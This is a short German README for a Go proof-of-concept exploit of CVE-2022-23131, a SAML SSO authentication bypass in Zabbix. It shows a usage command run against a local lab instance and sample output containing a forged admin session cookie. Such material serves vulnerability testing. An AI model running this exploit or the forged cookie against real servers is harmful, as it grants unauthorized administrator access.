
Proof-of-Concept-Exploit für CVE-2022-23131, eine Schwachstelle zur Umgehung der SAML-SSO-Authentifizierung in Zabbix. Enthält Umgebungseinrichtung und einen Go-basierten Prüfer zur Überprüfung der Ziel-Exposition.
Umgebung und PoC von CVE-2022-23131
Sie können eine Zabbix-Instanz mit SAML SSO erstellen, indem Sie den Schritten in Zabbix-Umgebung für CVE-2022-23131 folgen.
Der PoC wurde von jweny modifiziert.
Usage:
go run poc.go check -t http://localhost:8080 -u Admin
[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9